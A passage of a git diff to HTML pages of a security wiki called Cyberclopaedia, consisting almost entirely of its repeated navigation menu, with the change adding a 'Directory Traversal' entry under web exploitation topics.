        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html b/docs/Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html index 7105c1e1..8caa8469 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Abusing Linux Capabilities.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -183,22 +183,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html b/docs/Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html index eb39af5a..4bf7010c 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Abusing SUID & SGID Binaries.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
